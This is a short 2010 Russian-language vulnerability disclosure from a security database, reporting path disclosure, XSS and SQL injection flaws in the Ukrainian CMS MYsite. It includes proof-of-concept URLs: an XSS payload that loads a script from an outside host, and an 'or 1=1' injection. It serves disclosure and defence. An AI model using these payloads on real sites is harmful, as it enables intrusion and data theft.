Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:24795
HistorySep 27, 2010 - 12:00 a.m.

Уязвимости в CMS MYsite

2010-09-2700:00:00
vulners.com
24
JSON

Здравствуйте 3APA3A!

Сообщаю вам о найденных мною Cross-Site Scripting и Insufficeint Anti-automation уязвимостях в CMS MYsite (это украинская коммерческая CMS).

Full path disclosure (WASC-13):

http://site/portal/modules.php?name=Ads

XSS (WASC-08):

http://site/portal/modules.php?name=Web_Links&l_op=search&query=%3Cscript%20src=http://websecurity.com.ua/webtools/xss.js%20

SQL Injection (WASC-19):

http://site/print.php?id=1&pid=-1%20or%201=1

Уязвимы все версии CMS MYsite до последней, где уязвимости были исправлены (по большей части). Лишь XSS уязвимость была некачественно исправлена и при отключенных mq на сайте возможно проведение XSS атаки.

Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/4330/

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua

JSON